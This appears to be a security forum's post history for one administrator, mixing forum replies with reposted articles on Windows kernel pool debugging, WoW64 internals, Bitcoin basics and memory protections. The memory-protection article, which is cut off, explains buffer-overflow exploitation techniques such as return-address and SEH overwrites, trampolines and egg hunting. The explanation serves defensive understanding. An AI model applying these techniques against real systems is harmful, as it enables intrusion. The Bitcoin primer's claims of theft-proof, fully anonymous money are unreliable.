Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Nytro

    Parole si PM-uri.

    S-a incercat sa nu se logheze niciun IP si nu se poate deoarece sunt probleme cu logarea pe vBulletin. S-au sters pentru mult timp, la un anumit interval, toate IP-urile. Stupid si inutil. Ce nu intelegeti voi insa este ca RST nu e cosul de gunoi care risca sa fie inchis din cauza unor ratati. Cu alte cuvinte, nu am de gand sa protejez carderii sau mai stiu eu ce specimene ar putea fi cautate. Daca cineva sparge un site, nu o sa vina nimeni sa ceara logurile de pe RST, o sa ia logurile de pe site-ul respectiv. Daca cineva vinde insa CC-uri pe aici, ei bine, firma de hosting o sa se trezeasca cu gaborii la usa, iar eu nu vreau sa am probleme incercand sa apar niste hoti. Apoi, nu este problema noastra ca Vasile face cacaturi, vine pe RST si isi posteaza numele, adresa si CNP-ul. Nu e treaba noastra sa stergem aceste date. La fel cu IP-urile: daca ai ceva de ascuns NU ITI FOLOSESTI IP-ul REAL AICI, nu vii cu pretentia sa fie sterse IP-urile si nici contul sau cine stie ce loguri. Faci cacat, mananci cacat, ma doare in cur de ratatii care fac cine stie ce magarii ca sa faca si ei 50 de dolari. La munca, nu la milogit. Cum zicea si tex: daca vine politia si cere serverul pentru cine stie ce carder, il sterg de praf, ii pun fundita si le dau serverul.
  2. Nytro

    Parole si PM-uri.

    Hmmm, cred ca am o idee pentru two-factor authentication. Varianta cu mesaje catre un numar de telefon pica: 1. nu stiu daca gasim un serviciu ok de trimis mesaje 2. nu vreau sa pastram numerele voastre de telefon Dar: 1. User-ul uploadeaza o imagine 2. Se face sha1 pentru imaginea respectiva 3. Se compara hash-ul cu unul pastrat in baza de date 4. Fisierul nu trebuie sa fie neaparat o imagine Info: Hash-ul este creat la activarea optiunii. Pareri?
  3. Nytro

    Parole si PM-uri.

    Ar fi frumos dar dificil de implementat. Inutil, cei care au avut nevoie si-au resetat parolele. Toti din staff au facut-o, asta era mai important. Nu stiu daca ar ajuta cu ceva. In plus, asa cum se pot decrypta la citire... Asa se pot decrypta... Schimbarea parolei e de ajuns. Daca sunt persoane carora le pasa de contul sau, si-au schimbat deja de mult timp parola. Asta ar putea fi utila. O pagina in care sa apara IP-urile de pe care s-a logat cineva pe un cont, vizibila DOAR de pe acel cont, la asta te referi nu? E o idee de viitor, ne gandim la asa ceva, ar fi perfect daca ai veni cu niste idei si criterii de selectie.
  4. Nytro

    executabil

    Doar de pe un anumit calculator, ca hardware? Uite cateva idei: c++ - Generating a Hardware-ID on Windows - Stack Overflow Mai multe idei (de exemplu adresa MAC): https://www.google.ro/#safe=off&sclient=psy-ab&q=windows+get+unique+hardware+id&oq=windows+get+unique+hardware+id
  5. Ma, practic 340 RON in loc de 470 RON e ceva. Sunt totusi 130 RON. Da, o fi de marketing, dar pentru persoanele interesate e util. Exemplu: Asus RT-N56U Lista de preturi - cel mai mic pret
  6. [h=3]Understanding Pool Corruption Part 1 – Buffer Overflows[/h]ntdebug 14 Jun 2013 1:50 PM Before we can discuss pool corruption we must understand what pool is. Pool is kernel mode memory used as a storage space for drivers. Pool is organized in a similar way to how you might use a notepad when taking notes from a lecture or a book. Some notes may be 1 line, others may be many lines. Many different notes are on the same page. Memory is also organized into pages, typically a page of memory is 4KB. The Windows memory manager breaks up this 4KB page into smaller blocks. One block may be as small as 8 bytes or possibly much larger. Each of these blocks exists side by side with other blocks. The !pool command can be used to see the pool blocks stored in a page. kd> !pool fffffa8003f42000 Pool page fffffa8003f42000 region is Nonpaged pool *fffffa8003f42000 size: 410 previous size: 0 (Free) *Irp Pooltag Irp : Io, IRP packets fffffa8003f42410 size: 40 previous size: 410 (Allocated) MmSe fffffa8003f42450 size: 150 previous size: 40 (Allocated) File fffffa8003f425a0 size: 80 previous size: 150 (Allocated) Even fffffa8003f42620 size: c0 previous size: 80 (Allocated) EtwR fffffa8003f426e0 size: d0 previous size: c0 (Allocated) CcBc fffffa8003f427b0 size: d0 previous size: d0 (Allocated) CcBc fffffa8003f42880 size: 20 previous size: d0 (Free) Free fffffa8003f428a0 size: d0 previous size: 20 (Allocated) Wait fffffa8003f42970 size: 80 previous size: d0 (Allocated) CM44 fffffa8003f429f0 size: 80 previous size: 80 (Allocated) Even fffffa8003f42a70 size: 80 previous size: 80 (Allocated) Even fffffa8003f42af0 size: d0 previous size: 80 (Allocated) Wait fffffa8003f42bc0 size: 80 previous size: d0 (Allocated) CM44 fffffa8003f42c40 size: d0 previous size: 80 (Allocated) Wait fffffa8003f42d10 size: 230 previous size: d0 (Allocated) ALPC fffffa8003f42f40 size: c0 previous size: 230 (Allocated) EtwR Because many pool allocations are stored in the same page, it is critical that every driver only use the space they have allocated. If DriverA uses more space than it allocated they will write into the next driver’s space (DriverB) and corrupt DriverB’s data. This overwrite into the next driver’s space is called a buffer overflow. Later either the memory manager or DriverB will attempt to use this corrupted memory and will encounter unexpected information. This unexpected information typically results in a blue screen. The NotMyFault application from Sysinternals has an option to force a buffer overflow. This can be used to demonstrate pool corruption. Choosing the “Buffer overflow” option and clicking “Crash” will cause a buffer overflow in pool. The system may not immediately blue screen after clicking the Crash button. The system will remain stable until something attempts to use the corrupted memory. Using the system will often eventually result in a blue screen. Often pool corruption appears as a stop 0x19 BAD_POOL_HEADER or stop 0xC2 BAD_POOL_CALLER. These stop codes make it easy to determine that pool corruption is involved in the crash. However, the results of accessing unexpected memory can vary widely, as a result pool corruption can result in many different types of bugchecks. As with any blue screen dump analysis the best place to start is with !analyze -v. This command will display the stop code and parameters, and do some basic interpretation of the crash. kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff8009267244a, Address of the instruction which caused the bugcheck Arg3: fffff88004763560, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. In my example the bugcheck was a stop 0x3B SYSTEM_SERVICE_EXCEPTION. The first parameter of this stop code is c0000005, which is a status code for an access violation. An access violation is an attempt to access invalid memory (this error is not related to permissions). Status codes can be looked up in the WDK header ntstatus.h. The !analyze -v command also provides a helpful shortcut to get into the context of the failure. CONTEXT: fffff88004763560 -- (.cxr 0xfffff88004763560;r) Running this command shows us the registers at the time of the crash. kd> .cxr 0xfffff88004763560 rax=4f4f4f4f4f4f4f4f rbx=fffff80092690460 rcx=fffff800926fbc60 rdx=0000000000000000 rsi=0000000000001000 rdi=0000000000000000 rip=fffff8009267244a rsp=fffff88004763f60 rbp=fffff8009268fb40 r8=fffffa8001a1b820 r9=0000000000000001 r10=fffff800926fbc60 r11=0000000000000011 r12=0000000000000000 r13=fffff8009268fb48 r14=0000000000000012 r15=000000006374504d iopl=0 nv up ei pl nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206 nt!ExAllocatePoolWithTag+0x442: fffff800`9267244a 4c8b4808 mov r9,qword ptr [rax+8] ds:002b:4f4f4f4f`4f4f4f57=???????????????? From the above output we can see that the crash occurred in ExAllocatePoolWithTag, which is a good indication that the crash is due to pool corruption. Often an engineer looking at a dump will stop at this point and conclude that a crash was caused by corruption, however we can go further. The instruction that we failed on was dereferencing rax+8. The rax register contains 4f4f4f4f4f4f4f4f, which does not fit with the canonical form required for pointers on x64 systems. This tells us that the system crashed because the data in rax is expected to be a pointer but it is not one. To determine why rax does not contain the expected data we must examine the instructions prior to where the failure occurred. kd> ub . nt!KzAcquireQueuedSpinLock [inlined in nt!ExAllocatePoolWithTag+0x421]: fffff800`92672429 488d542440 lea rdx,[rsp+40h] fffff800`9267242e 49875500 xchg rdx,qword ptr [r13] fffff800`92672432 4885d2 test rdx,rdx fffff800`92672435 0f85c3030000 jne nt!ExAllocatePoolWithTag+0x7ec (fffff800`926727fe) fffff800`9267243b 48391b cmp qword ptr [rbx],rbx fffff800`9267243e 0f8464060000 je nt!ExAllocatePoolWithTag+0xa94 (fffff800`92672aa8) fffff800`92672444 4c8b03 mov r8,qword ptr [rbx] fffff800`92672447 498b00 mov rax,qword ptr [r8] The assembly shows that rax originated from the data pointed to by r8. The .cxr command we ran earlier shows that r8 is fffffa8001a1b820. If we examine the data at fffffa8001a1b820 we see that it matches the contents of rax, which confirms this memory is the source of the unexpected data in rax. kd> dq fffffa8001a1b820 l1 fffffa80`01a1b820 4f4f4f4f`4f4f4f4f To determine if this unexpected data is caused by pool corruption we can use the !pool command. kd> !pool fffffa8001a1b820 Pool page fffffa8001a1b820 region is Nonpaged pool fffffa8001a1b000 size: 810 previous size: 0 (Allocated) None fffffa8001a1b810 doesn't look like a valid small pool allocation, checking to see if the entire page is actually part of a large page allocation... fffffa8001a1b810 is not a valid large pool allocation, checking large session pool... fffffa8001a1b810 is freed (or corrupt) pool Bad previous allocation size @fffffa8001a1b810, last size was 81 *** *** An error (or corruption) in the pool was detected; *** Attempting to diagnose the problem. *** *** Use !poolval fffffa8001a1b000 for more details. Pool page [ fffffa8001a1b000 ] is __inVALID. Analyzing linked list... [ fffffa8001a1b000 --> fffffa8001a1b010 (size = 0x10 bytes)]: Corrupt region Scanning for single bit errors... None found The above output does not look like the !pool command we used earlier. This output shows corruption to the pool header which prevented the command from walking the chain of allocations. The above output shows that there is an allocation at fffffa8001a1b000 of size 810. If we look at this memory we should see a pool header. Instead what we see is a pattern of 4f4f4f4f`4f4f4f4f. kd> dq fffffa8001a1b000 + 810 fffffa80`01a1b810 4f4f4f4f`4f4f4f4f 4f4f4f4f`4f4f4f4f fffffa80`01a1b820 4f4f4f4f`4f4f4f4f 4f4f4f4f`4f4f4f4f fffffa80`01a1b830 4f4f4f4f`4f4f4f4f 00574f4c`46524556 fffffa80`01a1b840 00000000`00000000 00000000`00000000 fffffa80`01a1b850 00000000`00000000 00000000`00000000 fffffa80`01a1b860 00000000`00000000 00000000`00000000 fffffa80`01a1b870 00000000`00000000 00000000`00000000 fffffa80`01a1b880 00000000`00000000 00000000`00000000 At this point we can be confident that the system crashed because of pool corruption. Because the corruption occurred in the past, and a dump is a snapshot of the current state of the system, there is no concrete evidence to indicate how the memory came to be corrupted. It is possible the driver that allocated the pool block immediately preceding the corruption is the one that wrote to the wrong location and caused this corruption. This pool block is marked with the tag “None”, we can search for this tag in memory to determine which drivers use it. kd> !for_each_module s -a @#Base @#End "None" fffff800`92411bc2 4e 6f 6e 65 e9 45 04 26-00 90 90 90 90 90 90 90 None.E.&........ kd> u fffff800`92411bc2-1 nt!ExAllocatePool+0x1: fffff800`92411bc1 b84e6f6e65 mov eax,656E6F4Eh fffff800`92411bc6 e945042600 jmp nt!ExAllocatePoolWithTag (fffff800`92672010) fffff800`92411bcb 90 nop The file Pooltag.txt lists the pool tags used for pool allocations by kernel-mode components and drivers supplied with Windows, the associated file or component (if known), and the name of the component. Pooltag.txt is installed with Debugging Tools for Windows (in the triage folder) and with the Windows WDK (in \tools\other\platform\poolmon). Pooltag.txt shows the following for this tag: None - <unknown> - call to ExAllocatePool Unfortunately what we find is that this tag is used when a driver calls ExAllocatePool, which does not specify a tag. This does not allow us to determine what driver allocated the block prior to the corruption. Even if we could tie the tag back to a driver it may not be sufficient to conclude that the driver using this tag is the one that corrupted the memory. The next step should be to enable special pool and hope to catch the corruptor in the act. We will discuss special pool in our next article. Sursa: Understanding Pool Corruption Part 1 – Buffer Overflows - Ntdebugging Blog - Site Home - MSDN Blogs
  7. [h=2]WoW64 internals: Tale of GetSystemFileCacheSize[/h]June 28, 2013 / ReWolf Few days ago someone asked me if I can somehow add GetSystemFileCacheSize to wow64ext library. I’ve researched this topic a bit and the final answer is no, because it is not necessary. In today post I’ll try to describe internals of GetSystemFileCacheSize function and its limitations, I’ll also show the different way of obtaining the same information as original GetSystemFileCacheSize. [h=3]GetSystemFileCacheSize internals[/h] Body of the function can be found inside kernel32 library, it is pretty simple: BOOL WINAPI GetSystemFileCacheSize ( PSIZE_T lpMinimumFileCacheSize, PSIZE_T lpMaximumFileCacheSize, PDWORD lpFlags ) { BYTE* _teb32 = (BYTE*)__readfsdword(0x18); // mov eax, large fs:18h BYTE* _teb64 = *(BYTE**)(_teb32 + 0xF70); // mov eax, [eax+0F70h] DWORD unk_v = **(DWORD**)(_teb64 + 0x14D0); // mov eax, [eax+14D0h] SYSTEM_FILECACHE_INFORMATION sfi; //SystemFileCacheInformationEx = 0x51 NTSTATUS ret = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x51, &sfi, sizeof(sfi), 0); if (ret < 0) { BaseSetLastNTError(ret); return FALSE; } if ((unsigned int)sfi.MinimumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF || (unsigned int)sfi.MaximumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF ) { BaseSetLastNTError(STATUS_INTEGER_OVERFLOW); return FALSE; } *lpMinimumFileCacheSize = unk_v * sfi.MinimumWorkingSet; *lpMaximumFileCacheSize = unk_v * sfi.MaximumWorkingSet; *lpFlags = 0; if (sfi.Flags & FILE_CACHE_MIN_HARD_ENABLE) *lpFlags = FILE_CACHE_MIN_HARD_ENABLE; if (sfi.Flags & FILE_CACHE_MAX_HARD_ENABLE) *lpFlags |= FILE_CACHE_MAX_HARD_ENABLE; return TRUE; } So, let’s study it step by step. At first it gets some magic value from the TEB, figuring out where this value came from is the key to understand the whole function. FS:0×18 contains TEB32 pointer, next instruction gets another pointer from TEB32+0xF70, according to PDB symbols, this field is called GdiBatchCount: TEB32: ... +0xf6c WinSockData : Ptr32 Void +0xf70 GdiBatchCount : Uint4B +0xf74 CurrentIdealProcessor : _PROCESSOR_NUMBER ... First surprise, in WoW64 this field contains pointer to x64 TEB (yes, in WoW64 processes there are two TEBs, x86 and x64, as well as two PEBs, but regular readers of this blog probably already knew it ). In third step, it gets value from TEB64+0x14D0, according to PDB symbols it is one of the entries inside TlsSlots: TEB64: ... +0x1478 DeallocationStack : Ptr64 Void +0x1480 TlsSlots : [64] Ptr64 Void +0x1680 TlsLinks : _LIST_ENTRY ... Precisely speaking it is TEB64.TlsSlot[0x0A]. It took me some time to track the code responsible for writing to this particular TlsSlot, but I’ve succeeded. There is only one place inside wow64.dll that writes at this address: ;wow64.dll::Wow64LdrpInitialize: ... .text:0000000078BDC15C mov rax, gs:30h .text:0000000078BDC165 mov rdi, rcx .text:0000000078BDC168 xor r13d, r13d .text:0000000078BDC16B mov ecx, [rax+2030h] .text:0000000078BDC171 or r15, 0FFFFFFFFFFFFFFFFh .text:0000000078BDC175 mov r14d, 1 .text:0000000078BDC17B add rcx, 248h .text:0000000078BDC182 mov cs:Wow64InfoPtr, rcx .text:0000000078BDC189 mov rcx, gs:30h .text:0000000078BDC192 mov rax, cs:Wow64InfoPtr .text:0000000078BDC199 mov [rcx+14D0h], rax ;<- write to TlsSlot ... Above snippet is a part of the Wow64LdrpInitialize function (it is exported from wow64.dll) and there are a few interesting things. At first it gets TEB64 address from GS:0×30 (standard procedure on x64 windows), then it gets address from TEB64+0×2030, adds 0×248 to this address and stores this value in TEB64.TlsSlot[0x0A]. It stores it also in a variable called Wow64InfoPtr. Looking at this code under debugger reveals more interesting details, apparently TEB64+0×2000 points to TEB32, TEB32+0×30 contains pointer to PEB32: TEB32: ... +0x02c ThreadLocalStoragePointer : 0x7efdd02c +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB +0x034 LastErrorValue : 0 ... So, there is some mystical Wow64InfoPtr structure at PEB32+0×248 address. On Windows 7, 0×248 is the exact size of PEB32 structure (aligned to 8, on windows Vista it is 0×238, probably on Windows 8 it will be also different), so this new structure follows PEB32. Querying google for Wow64InfoPtr returns 0 results. Judging from the references, this structure contains at least three fields, I was interested only in the first one: ;wow64.dll::ProcessInit: ... .text:0000000078BD8F70 mov rax, cs:Wow64InfoPtr .text:0000000078BD8F77 mov edx, 1 .text:0000000078BD8F7C and dword ptr [rax+8], 0 .text:0000000078BD8F80 mov dword ptr [rax], 1000h ... Above code is part of the wow64.dll::ProcessInit function, and it has hardcoded 0×1000 value that is assigned to the first field of the Wow64InfoPtr structure. Summing things up, those first three operations at the begining of GetSystemFileCacheSize are just getting hardcoded 0×1000 value. I can guess, that this value represents size of the memory page inside WoW64 process, I can also confirm this guess by looking at the x64 version of GetSystemFileCacheSize: ;kernel32.dll::GetSystemFileCacheSize: ... .text:0000000078D67CF6 mov eax, cs:SysInfo.uPageSize .text:0000000078D67CFC mov ecx, [rsp+68h+var_48.Flags] .text:0000000078D67D00 imul rax, [rsp+68h+var_48.MinimumWorkingSet] .text:0000000078D67D06 mov [rsi], rax .text:0000000078D67D09 mov eax, cs:SysInfo.uPageSize .text:0000000078D67D0F imul rax, [rsp+68h+var_48.MaximumWorkingSet] ... Further part of the function is clear, it calls NtQuerySystemInformation with SYSTEM_INFORMATION_CLASS set to SystemFileCacheInformationEx (0×51). After this call SYSTEM_FILECACHE_INFORMATION structure is filled with desired information: typedef struct _SYSTEM_FILECACHE_INFORMATION { SIZE_T CurrentSize; SIZE_T PeakSize; ULONG PageFaultCount; SIZE_T MinimumWorkingSet; SIZE_T MaximumWorkingSet; SIZE_T CurrentSizeIncludingTransitionInPages; SIZE_T PeakSizeIncludingTransitionInPages; ULONG TransitionRePurposeCount; ULONG Flags; } SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; At this point function verifies if output values (lpMinimumFileCacheSize and lpMaximumFileCacheSize) fits in 32bits: if ((unsigned int)sfi.MinimumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF || (unsigned int)sfi.MaximumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF ) { ... } With the default (?) system settings lpMaximumFileCacheSize will exceed 32bits, because sfi.MaximumWorkingSet is set to 0×10000000 and unk_v (page size) is 0×1000, so multiplication of those values wouldn’t fit in 32bits. In that case function will return FALSE and set last Win32 error to ERROR_ARITHMETIC_OVERFLOW (0×00000216). [h=3]GetSystemFileCacheSize replacement[/h] I’m not really sure if there is some proper (and documented) way to replace this function, but one can use NtQuerySystemInformation with SystemFileCacheInformationEx (0×51) or SystemFileCacheInformation (0×15) classes, both classes are using the same SYSTEM_FILECACHE_INFORMATION structure. SystemFileCacheInformation (0×15) is used by CacheSet sysinternals tool. To get exactly the same values as from GetSystemFileCacheSize, results returned by NtQuerySystemInformation should be adjusted by below code snippet: lpMinimumFileCacheSize = PAGE_SIZE * sfi.MinimumWorkingSet; lpMaximumFileCacheSize = PAGE_SIZE * sfi.MaximumWorkingSet; lpFlags = 0; if (sfi.Flags & FILE_CACHE_MIN_HARD_ENABLE) lpFlags = FILE_CACHE_MIN_HARD_ENABLE; if (sfi.Flags & FILE_CACHE_MAX_HARD_ENABLE) lpFlags |= FILE_CACHE_MAX_HARD_ENABLE; Thanks for reading. Sursa: WoW64 internals: Tale of GetSystemFileCacheSize
  8. What is Bitcoin? Rohit Shaw June 28, 2013 Bitcoin is a digital currency or, we might say, electronic cash that uses peer-to-peer technology for transactions. Here peer-to-peer means it is not managed by any central authority. Normal currencies are managed by a central bank but Bitcoin is managed collectively by the network. The Bitcoin software was developed by Satoshi Nakamoto and it is based on open source cryptographic protocol. Each Bitcoin is subdivided down to eight decimal places, forming 100 million smaller units called satoshis. In simple terms, it is a SHA-256 hash in a hexadecimal format. Interesting facts about Bitcoin: Bitcoin is a digital currency. Because it is digital, you can literally backup your money, so, when properly cared for, it can’t be: Lost Stolen Frozen or seized. [*] Allows a direct and immediate transfer of value between two people anywhere in the world. [*] No banks, governments, or organizations control or influence it. [*] Cannot be counterfeited, inflated, printed, or devalued over time. [*] A peer-to-peer network functions as a distributed authority to record transactions. [*] Bitcoin operates on free, open-source software on any computer or smart phone. [*] There are no start-up, transaction, or usage fees. [*] Purchases can be completely anonymous. [*] Transactions cannot be reversed. [*] Privacy is enhanced with Bitcoin and it reduces identity theft. [*] Bitcoins can be exchanged in open markets for any other currency. Bitcoin Storage Media We already know that Bitcoin is digital currency and we are not able cash it out. In our world we handle our cash in our wallet or keep it in the bank. Here we do the same: We stored the Bitcoins in a Bitwallet. We can download the Bitwallet client software from http://bitcoin.org . This client software is compatible with Windows, MAC, and Linux operating systems. We can see the look of Bitwallet client software. We can see the overview of Bitcoin wallet in the figure above. Our balance is showing 0.00BTC, which means we have nothing right now. We also see few options in upper side bar: send coins, receive coins, transactions, address book, and export. Now we can see in the figure below, in the Receive coins option, a long alphanumeric string under the address tab. This is our Bitcoin address, which is used for transactions, mainly for receiving Bitcoins in the form of payments. It is more like a bank account number which is used for sending or receiving money. It is a cryptographic public key in human-readable strings and it consists of alphanumeric characters, for example, 17zMBU1enmZALpbDPeo5UGXFYBWbAg7MdR Next we are moving to the Send coins option; here we can see that there is an option for sending coins by adding their Bitcoin address in the Pay To section, then giving the Bitcoin in the Amount section, and clicking on Send to transfer it to the destination address. Next we will see how to use the Bitcoin online wallet. We can create an online wallet account from the following link https://blockchain.info/wallet/. Here is a snapshot of my online wallet account that I created. We can see what our online wallet it looks like in our client software. We have our Bitcoin address and we can see the account balance also, which is zero. And the same options are available here from the Bitcoin client software: Send Money, Receive Money, My transactions, and import/Export. How to Acquire Bitcoins? Acquiring Bitcoins is like the two sides of a coin. One side is very easy and other side is tough. There are two methods for earning Bitcoins. First is the easy method, purchasing online, and the second is by mining from online servers. We will cover both topics in this article. There are many online vendors who are trading in Bitcoins, such as BIPS, Bitbox, MtGox, bitNZ, Bitstamp, BTC-E, VertEx, etc. Here we are going to show you how to purchase Bitcoin from these vendors; for example, we are using MtGox for purchasing. Go to the following website https://mtgox.com/ and sign up for an account. We can see in the figure below how it looks after signing in. We can see in the above figure that there are two main options: Buy bitcoins and Sell bitcoins. If you want to buy, just give the number of Bitcoins in the Amount of BTC to BUY section and we can see that the price per coins is 122.00001 US dollar. Suppose we are buying 50 BTC; let us see how much USD we have to spend. We can see that we have to spend 6100 USD for purchasing 50 BTC. So we see here that purchasing Bitcoins is not a big deal, just we have to invest money for it. Now we will show you the tough and interesting part of earning Bitcoins from mining from online server. Mining Bitcoins is a process in which we run Bitcoin mining software, which solves complex mathematical equations in a mining server. If we are able to solve one of these equations, we will get paid in Bitcoins. Now we have to join a pool mining server. A pool is a group that combines their computing power to make more Bitcoins. We can’t mine alone in a server because these coins are awarded in blocks, usually 50 at a time. In this block you are given smaller and easier algorithms to solve and all of your combined work will solve the bigger algorithms. The earned Bitcoins are shared according to how much work you as an individual miner have contributed. Pool Features: All the features you’ll expect a Bitcoin pool to have, including instant pay per share. Merged mining; get bonus Namecoins to improve profits or register .bit domains. Best in the industry graphs, statistics, and monitoring. Mining teams for competitions, charity, or just to organize your mining farms. Statistics page for viewing average shares, estimated earnings per block, hashrate and more. Forgot password feature. Dashboard with balance, average speed, shares and stale viewing, instant payout to Bitcoin address, worker creation and statistics for each worker. API for both user and total pool. Fully customizable. The pool in which I am involved in is called BitMinter. I will show you how to join this pool server. Follow the link https://bitminter.com and sign up for account. In above figure we can see that the signup form asks for Worker name and password. Basically, for every miner that you have running, you will need to have a worker ID so the pool can keep track of your contributions. You can also see this worker after creating the account by going to MY ACCOUNT> Workers and here we can see our worker name, craker, is showing. Now that our pool account is ready, what we need Bitcoin mining software. First we have to install Bitcoin mining client software. There are many software programs available, such as BitMinter, 50Miner, Bit Moose, GUIMiner etc. We can use any one of these for mining but we are using here Bit Minter, which can be downloaded from this link https://bitminter.com/. We can see the BitMinter client software in the above figure. In the top left side it shows my CPU processor name and below that is my GPU name, GeForce GT 620M. In the status panel we can see it showing the message “Found 1 OpenCL-compatible GPU,” which means my GPU card is detected by this software. Now we can start our mining process. Run the program and click on the play button and then it will ask for your pool server account details which we already created. Give the details and then click on Proceed. Now we can see that our process is running and we can see our GPU mining speed in the speedometer. The speed which we are getting here is 12.97Mhps, which is not very fast. If we are using two or more expensive graphic cards with a high GPU core, we will get a higher speed. We are not using our CPU power because it will not give much speed but it will burn our system by getting overheated. GPU is always better than CPU for this purpose. A CPU is an executive and a GPU is a laborer. A CPU is designed primarily to be an executive and make decisions, as directed by the software. A GPU is very different. Yes, a GPU can do math, and can also do “this” and “that” based on specific conditions. GPUs have large numbers of ALUs, more so than CPUs. As a result, they can do large amounts of bulky mathematical labor in a greater quantity than CPUs. Let us see the mining status. For this go to Tools>Mining status. Here is our status: Now go to the account details option and there you will find your cash out settings. Add your Bitcoin address there; once you have earned Bitcoins, you can transfer them into your wallet via that address. What to Do with Bitcoins? Bitcoins work the same as paper money with some key differences. The Bitcoin price fluctuates so, if you invest wisely, you can make a decent amount of money by selling and buying them. Several business accept Bitcoin as a form of payment for services like Internet and mobile services, design, web hosting, email services, and VOIP/SMS services, as well as gambling sites. So Bitcoin can be used in many services as a made of payment. For example, we can see in the figure below that a security service allows Bitcoin as form of payment. References: What Is Bitcoin and What Can I Do With It? https://en.bitcoin.it/wiki/Main_Page Bitcoin - Wikipedia, the free encyclopedia Beginners Guide to Mining Bitcoins Sursa: What is Bitcoin?
  9. Windows Memory Protection Mechanisms Dejan Lukan July 05, 2013 Introduction When trying to protect memory from being maliciously used by the hackers, we must first understand how everything fits in the whole picture. Let’s describe how a buffer overflow is exploited: Finding Input Shellcode Address—When we send input data to the application, we must send data that will cause a buffer overflow to be triggered. But we must write the input data in such a way that we’ll include the address that points to our shellcode that was also input as part of the input data. This is needed so the program execution can later jump to the shellcode by using that shellcode memory address pointer. Data Structure Overwrite—In order for the program to actually jump to our shellcode, we must overwrite some data structure where the address is read from and jumped to. An example of such a structure is a function frame that’s stored on the stack every time a function is called; besides all the other stuff stored on the stack, one of them is also the return EIP address where the function will return when it’s done with the execution. If we over write that address with the address of our shellcode in memory, the program execution will effectively jump to that address and execute our shellcode. Finding the System Function’s Address—When our shellcode is being executed, it will often call various system functions, which we don’t know the addresses of. We can hardcode the addresses of the functions to call in the shellcode itself, but that wouldn’t be very portable and it often won’t work on modern systems because of the various memory protection mechanisms in place. In order to find the addresses of the functions that we want to call, we must dynamically find them upon the shellcode execution. We must mention that if only one of the above conditions is not true, then the buffer exploitation will fail and we won’t be able to execute our shellcode. This is an important observation because, if we’re not able to satisfy every condition, the exploit will not work and the attack will be prevented. Next, we’ll discuss the techniques we can use to prevent one (or many) of the above conditions from being satisfied by malicious hackers. Let’s mention it again: If we’re able to prevent hackers from satisfying at least one of the above conditions, then the exploitation of the buffer overflow will fail. This is why we’ll take a look at methods of preventing each of the conditions from being satisfied. Let’s not forget about the conditions where the buffer is very small and we can’t actually exploit the condition in one go, but we must send multiple packets to the target in order to successfully exploit it;; one such technique is the egg-hunting exploitation technique, where we first inject some malicious code into the process’s memory, which contains an identifiable group of bytes often referred to as an egg. After, that we need to inject a second (and possibly a third, fourth, etc.) input into the process, which actually exploits and overwrites the return EIP address. Thus, we can jump to the first part of the shellcode, which must find the egg in memory and continue the execution from there – this is the shellcode we’ve inputted into the process’s memory with the first packet. We must keep in mind that in all of those special cases, the above conditions must still hold, which is also the reason we’ll be examining them in more detail later in the article. I guess we can also mention that none of the exploitation techniques would be possible if programmers would write safe code without bugs. But because life is not perfect, bugs exist and hackers are exploiting them every day. Because of that, whitehat hackers have come up with various ways to prevent the exploitation of bugs even if they exist in the code: some of the techniques can be easily bypassed but others are very good at protecting the process’s memory. Techniques for Protecting the Finding of Input Shellcode Address When exploiting a service, we’re sending input data to the service, which stores it in a buffer. The input data usually contains bytes that represent native CPU instructions. The buffer where our input bytes are written to can be located anywhere in memory: on the stack on the heap in the static data area (initialized or uninitialized). Currently, the following methods prevent us from guessing the right input address, which we can use to overwrite some important data structure that enables us to jump to our shellcode. These methods are: Instruction set randomization: read this article. Randomizing parts of the operating system – ASLR: read this article. We need to overwrite the return address EIP or some other similar structure to jump to some instructions in memory that can help us eventually jump to our shellcode. This is why we need to overwrite the structure with something meaningful, like an address that can take us to our shellcode and execute it. There are possibly infinite possibilities of how we can do that, but let’s list just a few of them to get an idea how this can be done: call/jmp reg—We’re using the register that contains the address of our shellcode, which we’re calling to effectively execute that shellcode. We can find either the “call reg” or “jmp reg” in one of the libraries the program needs to execute in order to jump to the shellcode. Note that this only works if one of the registers contains an address that points somewhere into the shellcode. pop ret—If we cannot use the previous option because none of the registers point somewhere in our shellcode, but there’s an address that points to the shellcode written on the stack somewhere, we can use multiple pop and one ret instruction to jump to that address. push ret—If one of the registers points somewhere in our shellcode, we can also use the “push ret” instruction. This is particularly good if we cannot use the “call/jmp reg,” because we’re unable to find the appropriate jmp/call instructions in the loaded libraries. To solve that, we can push the address on the stack and then return to it by using the push reg and ret instructions. jmp [reg + offset]—We can use this instruction if there’s a register that points to our shellcode in memory, but doesn’t point to the beginning of our shellcode. We can try to find the instruction “jmp [reg+offset],” which will add the required bytes to the register and then jump to that address, presumably to the beginning of our shellcode. popad—The “popad” instruction will pop double words from the stack into the general purpose registers EDI, ESI, EBP, EBX, EDX, ECX and EAX. Also, the ESP register will be incremented by 32. By using this technique, we can make the ESP register point directly to our shellcode and then issue the jmp esp instruction to jump to it. If the shellcode is not present at the 32-byte boundary, we can add a number of nop instructions at the beginning of our shellcode to make it so. forward short jump (jmp num)—We can use forward short jump if we want to jump over a couple of bytes. The opcode for the jmp instruction is 0xeb, so if we would like to jump over 16 bytes, we could use the 0xeb,0×10 instructions. We could also use conditional jump instructions, where just the opcode is changed. backward short jump (jmp num)—This is the same as forward short jump, except that we would like to jump backward. We can do this by using a negative offset number, where the 8-bit needs to be 1. If we would like to jump 16 bytes back, we could use the following instructions 0xeb,0×90. SEH—Windows applications have something called a default exception handler, which is provided by the operating system. Even if the application doesn’t use exception handling, we can try to overwrite the SEH handler and then generate some exception, which will call that exception handler. Since we’ve overwritten the exception handler with the pointer to our shellcode, that will be executed when an exception occurs. Techniques for 